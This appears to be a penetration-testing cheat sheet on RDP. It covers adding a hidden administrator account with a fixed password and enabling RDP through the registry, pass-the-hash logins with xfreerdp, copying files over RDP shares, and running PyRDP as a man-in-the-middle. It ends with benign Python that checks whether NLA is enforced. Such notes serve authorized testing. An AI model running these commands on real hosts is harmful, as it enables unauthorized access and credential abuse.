If you find .rdp files, see Mimikatz for Windows Credential Manager.
Bruteforce
See Crowbar.
Connect to RDP from Kali
Prerequisites
The user needs to be in the "Remote Desktop Users" group to be able to log in. The commands below (two equivalent ways of creating the account) add a local user, put it in that group (and optionally in Administrators), enable RDP by clearing fDenyTSConnections, and finally display the account:
net user /add myprecious MyPrecious123
net localgroup "Remote Desktop Users" myprecious /add
net user myprecious MyPrecious123 /add
net localgroup Administrators myprecious /add
net localgroup "Remote Desktop Users" myprecious /add
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
net user myprecious
rdesktop
rdesktop is a basic Linux Remote Desktop client.
rdesktop $IP -u <username>
rdesktop $IP -u <username> -p <password> -g 1024x768 -x 0x80
Sharing Kali directory /home/kali/share
Redirects a path to the share \\tsclient\<sharename> on the server (requires Windows XP or newer). The share name is limited to 8 characters.
rdesktop $IP -d <domain> -u <username> -r disk:myshare=/home/kali/share
Access the share on Windows
dir \\tsclient\myshare
copy <filename> \\tsclient\myshare\
FreeRDP
Use FreeRDP, an X11 client already installed on Kali Linux.
man xfreerdp
xfreerdp /cert:ignore /f /u:${USER} /v:$IP
xfreerdp /cert:ignore /u:${USER} /pth:${NTLM_HASH} /v:${IP}
xfreerdp /cert:ignore /u:${USER} /d:${DOMAIN} /pth:${NTLM_HASH} /v:${IP}
xfreerdp /cert:ignore /f /u:${USER} /p:${PASS} /v:$IP:$PORT
xfreerdp /cert:ignore /u:${USER} /d:${DOMAIN} /v:$IP:3389 /drive:myshare,/home/kali/share
dir \\tsclient\myshare
Connect to RDP from Windows
Type rdp in the Windows search bar.
Remote Desktop Connection Manager
Local user
<machine name>\<username>
.\<username>
RDP Server
- xrdp – Open-source Remote Desktop Protocol server
sudo apt install -y kali-desktop-xfce xorg xrdp
sudo systemctl enable xrdp --now
The status output shows the port xrdp is listening on.
sudo systemctl status xrdp
Connect as usual with mstsc or rdesktop.
PyRDP attack tool
PyRDP is a Python Remote Desktop Protocol (RDP) Monster-in-the-Middle (MITM) tool and library.
Installation
git clone https://github.com/gosecure/pyrdp.git
apt install python3.9-venv
cd pyrdp
python3 -m venv venv
source venv/bin/activate
pip3 install -U pip setuptools wheel
pip3 install -U -e '.[full]'
If you ever want to leave your virtual environment, you can simply deactivate it:
deactivate
Note that you will have to activate your environment every time you want to have the PyRDP scripts available as shell commands.
cd pyrdp
python3 -m venv venv
source venv/bin/activate
Help
pyrdp-mitm.py -h
Monster-in-the-middle
pyrdp-mitm.py $IP
# For the replay
pyrdp-mitm.py -l 0.0.0.0:3389 <public IP>
Configure port forwarding in VirtualBox or VMware:
Host port: 13389
Guest port: 3389
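The X.224 connection negotiation that every RDP client, PyRDP included, performs before a session starts is where the server announces which security protocol it accepts, and it is also where an administrator can verify that Network Level Authentication (NLA) is enforced on an exposed listener. As an added example that is not part of this page or of the PyRDP project, the Python below builds the RDP_NEG_REQ connection request, parses the server's RDP_NEG_RSP or RDP_NEG_FAILURE reply (structures from MS-RDPBCGR), and reports whether a TLS-only request was refused with HYBRID_REQUIRED_BY_SERVER, which is the signal that NLA is required. The sample replies are hand-constructed byte strings, not captures; `check_nla_enforced` is the only function that touches the network and is intended for auditing your own hosts.

```python
import socket
import struct

# Security protocol flags from MS-RDPBCGR (RDP_NEG_REQ.requestedProtocols)
PROTOCOL_RDP = 0x00000000        # standard RDP security, no TLS
PROTOCOL_SSL = 0x00000001        # TLS without NLA
PROTOCOL_HYBRID = 0x00000002     # CredSSP, i.e. Network Level Authentication

TYPE_RDP_NEG_RSP = 0x02
TYPE_RDP_NEG_FAILURE = 0x03

FAILURE_CODES = {
    0x01: "SSL_REQUIRED_BY_SERVER",
    0x02: "SSL_NOT_ALLOWED_BY_SERVER",
    0x03: "SSL_CERT_NOT_ON_SERVER",
    0x04: "INCONSISTENT_FLAGS",
    0x05: "HYBRID_REQUIRED_BY_SERVER",
    0x06: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER",
}


def build_connection_request(requested_protocols, cookie=b"Cookie: mstshash=audit\r\n"):
    """TPKT + X.224 Connection Request carrying an RDP_NEG_REQ for the given protocols."""
    # RDP_NEG_REQ: type 0x01, flags, length (always 8), requestedProtocols; little-endian
    neg_req = struct.pack("<BBHI", 0x01, 0x00, 8, requested_protocols)
    # X.224 CR fixed part: code 0xE0 (CR, CDT 0), DST-REF, SRC-REF, class 0
    x224 = struct.pack(">BHHB", 0xE0, 0, 0, 0) + cookie + neg_req
    tpdu = struct.pack("B", len(x224)) + x224               # LI counts everything after itself
    return struct.pack(">BBH", 3, 0, 4 + len(tpdu)) + tpdu  # TPKT: version 3, reserved, total length


def parse_connection_confirm(data):
    """Decode the server's TPKT + X.224 Connection Confirm into a small result dict."""
    if len(data) < 11 or data[0] != 3:
        raise ValueError("not a TPKT packet")
    if struct.unpack(">H", data[2:4])[0] != len(data):
        raise ValueError("TPKT length field does not match packet size")
    li = data[4]
    if (data[5] & 0xF0) != 0xD0:
        raise ValueError("not an X.224 Connection Confirm")
    if li < 14:
        # No RDP_NEG_RSP present: a pre-negotiation server, standard RDP security only
        return {"type": "legacy", "selected_protocol": PROTOCOL_RDP}
    neg_type, _flags, length, value = struct.unpack("<BBHI", data[11:19])
    if length != 8:
        raise ValueError("bad RDP negotiation structure length")
    if neg_type == TYPE_RDP_NEG_RSP:
        return {"type": "response", "selected_protocol": value}
    if neg_type == TYPE_RDP_NEG_FAILURE:
        return {"type": "failure", "failure_code": value,
                "failure_name": FAILURE_CODES.get(value, "UNKNOWN")}
    raise ValueError("unknown negotiation structure type %#x" % neg_type)


def nla_enforced(confirm):
    """True when a TLS-only request was refused because the server insists on NLA."""
    return confirm["type"] == "failure" and confirm["failure_code"] == 0x05


def check_nla_enforced(host, port=3389, timeout=5.0):
    """Live check against one of your own hosts: request TLS only and read the answer."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_connection_request(PROTOCOL_SSL))
        reply = sock.recv(1024)
    return nla_enforced(parse_connection_confirm(reply))


# Constructed sample replies (hand-assembled for this example, not captured from a real server)
SAMPLE_NLA_REQUIRED = bytes.fromhex("03000013" "0ed000001234" "00" "0300080005000000")
SAMPLE_TLS_ALLOWED = bytes.fromhex("03000013" "0ed000001234" "00" "0200080001000000")
SAMPLE_LEGACY = bytes.fromhex("0300000b" "06d000001234" "00")

if __name__ == "__main__":
    for name, sample in [("nla", SAMPLE_NLA_REQUIRED), ("tls", SAMPLE_TLS_ALLOWED), ("legacy", SAMPLE_LEGACY)]:
        result = parse_connection_confirm(sample)
        print(name, result, "NLA enforced:", nla_enforced(result))
```

Requesting only PROTOCOL_SSL is deliberate: a server that allows TLS without NLA answers with an RDP_NEG_RSP selecting it, while one that enforces NLA can only answer with RDP_NEG_FAILURE code 0x05. A reply without any negotiation structure (LI of 6) means the server predates protocol negotiation and speaks standard RDP security only, which is worth flagging on its own.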